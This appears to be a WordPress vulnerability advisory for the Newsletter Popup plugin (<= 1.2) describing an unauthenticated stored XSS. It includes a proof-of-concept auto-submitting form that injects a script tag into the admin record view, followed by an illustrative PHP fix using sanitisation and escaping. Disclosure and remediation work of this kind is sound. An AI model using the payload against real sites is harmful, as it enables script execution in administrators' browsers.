wpexploit | Bob Matyas | WPEX-ID:F4047F1E-D5EA-425F-8DEF-76DD5E6A497E
History: Apr 25, 2024 - 12:00 a.m.

Newsletter Popup <= 1.2 - Unauthenticated Stored XSS

2024-04-25 00:00:00
Bob Matyas
35
newsletter popup
unauthenticated
stored xss
may 09 2024
update

AI Score: 6.3 (Confidence: High)

EPSS: 0 (Percentile: 9.0%)

Description

The plugin does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks against admins.

1. Make sure there is a newsletter configured with the setting "Email Service > Save to local database"
2. When not logged in, use an HTML file where `<NL_ID>` is a valid newsletter ID:

```html
<!-- The NAME value inside nl_data carries the markup that is later rendered in the admin "Local Record" view -->
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin-ajax.php" method="post">
        <input type="hidden" name="action" value="save_newsletter">
        <input type="hidden" name="nl_id" value="<NL_ID>">
        <input type="hidden" name="nl_name" value="Unauthenicated">
        <input type="hidden" name="nl_data" value='EMAIL%3Dtestemail%2540email.com%26NAME%3D"><script>alert(1234)</script>TIME%3D2024-03-15%252009%253A24%253A36'>
        <input type="submit" value="Submit Request">
    </form>
</body>
```
3. Go to "Newsletter Popup > Local Record"
4. Select "Show Record" and see the XSS
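
One way to close this class of bug in a WordPress AJAX handler, as an added example that is not the plugin's code or its actual fix: sanitise each field when the request is saved and escape it again when the admin view renders it. The handler, table and render function names are hypothetical, and the EMAIL/NAME/TIME layout of nl_data is assumed from the request above.

```php
<?php
// Added example, not the plugin's code. Handler, table and function names are
// hypothetical; nl_data is assumed to be a URL-encoded EMAIL/NAME/TIME string.
add_action( 'wp_ajax_nopriv_save_newsletter', 'nlp_example_save_newsletter' );
add_action( 'wp_ajax_save_newsletter', 'nlp_example_save_newsletter' );

function nlp_example_save_newsletter() {
    global $wpdb;

    $nl_id = isset( $_POST['nl_id'] ) ? absint( $_POST['nl_id'] ) : 0;
    $raw   = isset( $_POST['nl_data'] ) ? wp_unslash( $_POST['nl_data'] ) : '';
    if ( ! $nl_id || ! is_string( $raw ) ) {
        wp_send_json_error( 'Invalid request', 400 );
    }

    // Decode the field list rather than storing the raw request string.
    parse_str( $raw, $fields );
    $email = isset( $fields['EMAIL'] ) && is_string( $fields['EMAIL'] ) ? $fields['EMAIL'] : '';
    $name  = isset( $fields['NAME'] ) && is_string( $fields['NAME'] ) ? $fields['NAME'] : '';

    // Sanitise on input: reduce each field to the type it should hold.
    $email = sanitize_email( $email );
    $name  = sanitize_text_field( $name ); // strips tags and line breaks
    if ( ! is_email( $email ) ) {
        wp_send_json_error( 'Invalid email', 400 );
    }

    $wpdb->insert(
        $wpdb->prefix . 'nlp_example_records', // hypothetical table
        array(
            'nl_id'   => $nl_id,
            'email'   => $email,
            'name'    => $name,
            'created' => current_time( 'mysql' ), // server clock, not the client TIME
        ),
        array( '%d', '%s', '%s', '%s' )
    );
    wp_send_json_success();
}

// Escape on output: the admin record view treats every stored value as text,
// so rows saved before the fix cannot inject markup either.
function nlp_example_render_record_row( $record ) {
    printf(
        '<tr><td>%s</td><td>%s</td><td>%s</td></tr>',
        esc_html( $record->email ),
        esc_html( $record->name ),
        esc_html( $record->created )
    );
}
```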
